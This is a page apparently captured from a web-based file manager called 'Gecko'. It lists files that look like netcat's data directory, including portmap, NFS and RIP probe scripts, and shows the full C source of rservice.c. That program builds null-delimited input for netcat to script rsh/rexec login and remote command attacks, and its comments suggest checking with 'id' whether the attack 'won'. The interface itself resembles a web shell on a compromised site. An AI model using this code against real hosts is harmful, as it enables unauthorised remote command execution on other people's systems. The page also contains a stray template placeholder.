Gecko [ lorencats.com ]

Name	Size	Permission
Makefile	186 B	-rw-r--r--
README	440 B	-rw-r--r--
data.c	6.56 KB	-rw-r--r--
dns-any.d	450 B	-rw-r--r--
nfs-0.d	520 B	-rw-r--r--
pm.d	353 B	-rw-r--r--
pmap-dump.d	1.33 KB	-rw-r--r--
pmap-mnt.d	1.53 KB	-rw-r--r--
rip.d	1.07 KB	-rw-r--r--
rservice.c	1.41 KB	-rw-r--r--
showmount.d	921 B	-rw-r--r--
xor.c	1.96 KB	-rw-r--r--

Code Editor : rservice.c

/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
   rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.

args:
	locuser remuser [cmd]
	remuser passwd [cmd]

cmd defaults to "pwd".

... whatever.  _H*/

#include <stdio.h>

/* change if you like; "id" is a good one for figuring out if you won too */
static char cmd[] = "pwd";

static char buf [4096];

main(argc, argv)
  int argc;
  char * argv[];
{
  register int x;
  register int y;
  char * p;
  char * q;

p = buf;
  memset (buf, 0, sizeof (buf));

p++;				/* first null */
  y = 1;

if (! argv[1])
    goto wrong;
  strncpy (p, argv[1], sizeof (buf) - y); /* first arg plus another null */
  x = strlen (argv[1]) + 1;
  p += x;
  y += x;
  if (y >= sizeof (buf))
    goto over;

if (! argv[2])
    goto wrong;
  strncpy (p, argv[2], sizeof (buf) - y);	/* second arg plus null */
  x = strlen (argv[2]) + 1;
  p += x;
  y += x;
  if (y >= sizeof (buf))
    goto over;

q = cmd;
  if (argv[3])
    q = argv[3];
  strncpy (p, q, sizeof (buf) - y); /* the command, plus final null */
  x = strlen (q) + 1;
  p += x;
  y += x;
  if (y >= sizeof (buf))
    goto over;

strncpy (p, "\n", sizeof (buf) - y); /* and a newline, so it goes */
  y++;

write (1, buf, y);		/* zot! */
  exit (0);

wrong:
  fprintf (stderr, "wrong!  needs 2 or more args.\n");
  exit (1);

over:
  fprintf (stderr, "out of memory!\n");
  exit (1);
}

${this.title}

Code Editor : rservice.c